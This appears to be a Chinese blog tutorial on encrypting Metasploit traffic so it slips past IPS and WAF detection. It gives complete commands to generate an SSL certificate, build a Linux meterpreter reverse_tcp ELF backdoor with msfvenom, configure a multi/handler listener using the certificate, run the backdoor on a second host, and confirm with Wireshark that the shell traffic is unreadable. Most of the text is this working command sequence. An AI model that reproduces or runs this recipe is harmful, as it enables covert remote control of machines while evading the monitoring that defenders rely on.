MSF流量加密

1、背景介绍

在MSF中生成shell,并上线运行时。都是通过`http` `https` `tcp`等协议传输。虽然MSF本身会对流量进行加密,但MSF太出名以致于其加密特征容易被IPS,WAF等可以检测带有攻击的特征的设备拦截或记录。

2、生成 SSL 证书

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

 

3、使用 MSF 生成带证书的后门

针对不同版本 msf 的不同命令

其中 lhost 为本机 IP,mshell.elf 为生成的文件名

msf5:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.249.132 LPORT=8888 -f elf > mshell.elf

msf6:

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.249.132 LPORT=8888 -f elf > mshell.elf

我这里是 msf6

使用 ls 命令查前面生成的相应证书和文件

4、配置带证书的 MSF 后门监听

启动MSF

msfdb run

选择攻击载荷

use exploit/multi/handler

 设置payload、监听IP、端口以及证书

set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.249.132
set lport 8888
set HandlerSSLCert /home/kali/key.pem

开启监听

exploit

5、meterpreter 会话建立与 shell 命令执行

将 mshell.elf 放到另一台 kali 

对该文件加权后执行 

chmod u+x mshell.elf
./mshell.elf

可以发现连接建立成功并且可以执行 shell 命令

6、使用wireshark抓包进行流量验证

开启wireshark抓取eth0

执行ifconfig

分析数据包,看不出任何与ifconfig有关的信息

包括响应包的内容,也是被加密了的

相关推荐

  1. 加拿大MSB牌照办理流程

    2024-01-13 20:56:01       11 阅读

最近更新

  1. TCP协议是安全的吗?

    2024-01-13 20:56:01       19 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-01-13 20:56:01       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-01-13 20:56:01       20 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-01-13 20:56:01       20 阅读

热门阅读

  1. Vue面试之watch与computed的区别

    2024-01-13 20:56:01       39 阅读
  2. 代码随想录算法训练营29期Day15|LeetCode 102,226,101

    2024-01-13 20:56:01       37 阅读
  3. LVGL 8.x适配嵌入式Linux的Framebuffer

    2024-01-13 20:56:01       37 阅读
  4. 复习c语言考试-xtu

    2024-01-13 20:56:01       39 阅读
  5. Python - requests 上传文件及报错

    2024-01-13 20:56:01       42 阅读
  6. C++指针与引用的对比

    2024-01-13 20:56:01       40 阅读
  7. three.js学习笔记 day1-2

    2024-01-13 20:56:01       27 阅读
  8. HTML基本语法

    2024-01-13 20:56:01       33 阅读